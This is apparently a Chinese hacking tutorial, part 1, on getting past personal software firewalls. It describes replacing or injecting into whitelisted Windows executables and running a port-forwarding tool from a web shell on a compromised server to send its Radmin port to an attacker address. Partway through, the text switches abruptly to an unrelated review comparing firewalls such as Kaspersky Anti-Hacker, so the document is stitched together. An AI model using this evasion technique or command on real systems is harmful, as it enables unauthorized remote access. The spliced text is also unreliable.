通杀国内一些防火墙技巧(1)

一直以来都有一个梦想：偶要是能发现些漏洞或BUG什么的该多好啊！于是整天对着电脑瞎弄瞎研究，研究什么呢？研究如何突破防火墙（偶这里指的防火墙是软体型的个人防火墙，硬件的偶也没条件。）嘿嘿，你还别说，还真没白研究，还真给偶发现了大多数防火墙的通病。这个BUG能让我们欺骗防火墙来达到访外的目的，具体情况是怎么样的呢？请看下面的解说！

首先，我要介绍一下Windows系统特性，当一个程序运行时，它不能删除，但却能够改名！而当系统里的被保护程序遭到删除或损坏或改名时系统就会及时调用备份文件给予还原！我再讲讲防火墙，大家都知道许多防火墙的“应用程序规则”里一般默认就会让IE浏览器（iexplore.exe）、Outlook Express（msimn.exe）、lsass.exe、spoolsv.exe、MSTask.exe、winlogon.exe、 services.exe、svchost.exe通过，而大多的防火墙认为只要是与规则里的路径及文件名相同就Pass！以这样的检测方法来决定是否放行，但它却完全没考虑到如果是别的文件替换的呢？——就相当于古装片里的易容术，易容后就认不得了！这就给了我们机会，我们可以利用这个BUG来欺骗防火墙来达到访外的目的！

小知识：其实现在大多木马采用的DLL插线程技术也就是利用了这个原理，它们首先隐蔽的开启一个认证放行的程序进程（如Iexplore.exe进程），接着把DLL型木马插入这个线程内，然后访外时就可轻松突破防火墙的限制了——因为防火墙是不会拦截已认证放行的程序的。

原理讲完了，我们现在讲讲该如何利用这个BUG了！这里我用虚拟机做实验，制造如下条件：
为了更符合现实，我给服务器安装了“天网防火墙”、Radmin（但由于防火墙指定了访问IP地址，所以没办法正常连接！），MSSQL SERVER、Serv-u。首先我们用常用的方法进行端口转发，看看防火墙有什么反应！

第一步，启用AngelShell Ver 1.0里的Fport（用来进行端口转发的服务端，几乎可以转发任何端口），然后在本地用FportClient（用来进行端口转发的客户端）监听好！

第二步，直接在CMDSHELL里运行“e:\www\fport.exe 4899 192.168.1.1 7788”，这时我们看到虚拟机里的“天网”对Fport马上进行了拦截。

一篇关于防火墙的冲突的文章

近来试用了比较流行的几个防火墙，在使用过程中进行了一些比较，记下了些文字，希望对一些不知道该如何选择的提供一些参考。同时希望交流，共同提高。

只是比较之用，没有广告之意。使用全在各有所爱。

一.Kaspersky(卡巴斯基)防火墙（Kaspersky Anti-Hacker）

1.设置简单，和Kaspersky(卡巴斯基)杀毒软件一起使用没有冲突，与ZoneAlarm Pro version:5.5.094.000运行也可以，没见死机。

2.内存占用小，刚启动时6M左右，最小时1M不到。

3.可以查看正在打开的端口，正在连接网络的应用程序及连接地址、端口。